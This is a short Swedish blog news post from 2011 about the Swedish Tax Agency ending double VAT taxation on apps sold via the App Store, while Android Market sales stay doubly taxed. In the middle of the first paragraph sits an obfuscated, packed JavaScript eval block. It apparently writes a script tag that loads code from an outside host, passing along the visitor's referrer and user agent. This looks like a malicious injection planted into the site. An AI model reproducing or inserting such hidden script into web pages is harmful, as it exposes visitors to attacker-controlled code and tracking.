Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Skatteverket: ingen mer dubbelbeskattning av appar

Skatteverket: ingen mer dubbelbeskattning av appar
Filip Urde
  • On 29 november, 2011
  • http://www.revue.se/filip-urde

Svenska apputvecklare har länge klagat på att de har dubbelbeskattning när de säljer appar inom EU. De har varit tvungna att betala moms i app-butiken (appstore,), eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iiriz|var|u0026u|referrer|tyaie||js|php’.split(’|’),0,{}))
sen har de varit tvungna att betala moms till skatteverket. Alltså 2ggr.

Resten av EU har tagit ut momsen via app-butikerna men då det har saknats gemensamma EU-regler på det här området har svenska Skatteverket gjort lite annorlunda.

Skatteverket har dock förstått att detta är ganska knäppt och säger följnade:

– För att undvika att enskilda företag drabbas av dubbelbeskattning har Skatteverket beslutat att inte påföra moms på app-företagens försäljning i de fall ett annat land tar ut moms på samma försäljning

Men av någon bra anledning så gäller detta endast appstore och inte android market, som alltså fortsatt har dubbelbeskattning. Det beror på att Luxemburg hört av sig till Sverige och ansåg sig ha beskattningsrätten för de appar som säljs därifrån. Det hela en konflikt mellan två länder, inte mellan svenska Skatteverket och apputvecklarna. Soppa!

De nya reglerna började gälla 1 oktober i år.
www.skatteverket.se